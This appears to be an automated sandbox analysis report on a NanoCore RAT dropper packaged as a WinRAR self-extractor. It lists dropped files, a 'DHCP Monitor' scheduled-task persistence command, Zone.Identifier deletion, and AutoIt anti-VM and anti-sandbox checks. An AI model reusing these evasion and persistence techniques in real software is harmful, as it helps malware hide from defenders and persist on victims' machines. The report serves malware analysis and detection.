Source: P05jmXYKpr.exe

Static file information: File size 1115860 > 1048576

Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: P05jmXYKpr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: P05jmXYKpr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: P05jmXYKpr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: P05jmXYKpr.exe
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.648908774.0000000005F60000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651126783.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbj source: RegSvcs.exe, 0000000D.00000003.482399735.0000000001C53000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000003.467685686.0000000001C53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000D.00000000.419225570.0000000000D22000.00000002.00000001.01000000.0000000C.sdmp, RegSvcs.exe, 0000000D.00000002.634072543.0000000001BEA000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe.7.dr, dhcpmon.exe.13.dr
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651206131.0000000007AC0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651288244.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 0000000D.00000002.651096129.0000000007A90000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 0000000D.00000002.651171603.0000000007AB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp

Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: P05jmXYKpr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F640 push ecx; ret
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096EB78 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002A0332 push edi; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270E06 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFE push eax; iretd
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026DBFC push cs; iretd

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: P05jmXYKpr.exe

Static PE information: section name: .didat

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5537109

Jump to behavior

Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.1100000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	File created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002E25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_0026FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match

File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESD
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000002.429704985.00000000018CE000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425143346.00000000018CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: boaliim.dat, 00000007.00000003.428295579.000000000182F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424245020.000000000182B000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.000000000182C000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.428339663.0000000001831000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425049143.000000000182E000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENH

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 186 > 30
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat TID: 7516	Thread sleep count: 125 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 8036	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 9709
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 423
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 491

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

API coverage: 5.9 %

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

API call chain: ExitProcess graph end node

Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe+
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exej
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: boaliim.dat, 00000007.00000003.427785381.0000000001872000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424701691.0000000001862000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.427822290.0000000001875000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424412397.0000000001861000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Q
Source: boaliim.dat, 00000007.00000003.424090847.0000000001827000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then?\|
Source: boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then1Qg
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: boaliim.dat, 00000007.00000003.425426415.0000000001869000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: boaliim.dat, 00000007.00000003.427989410.0000000001824000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.424225057.0000000001822000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404297594.000000000180F000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat, 00000007.00000003.404375360.0000000001820000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: RegSvcs.exe, 0000000D.00000002.634072543.0000000001C08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ikvvfncnn.bmp.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096E6A3 VirtualQuery,GetSystemInfo,

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0095A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
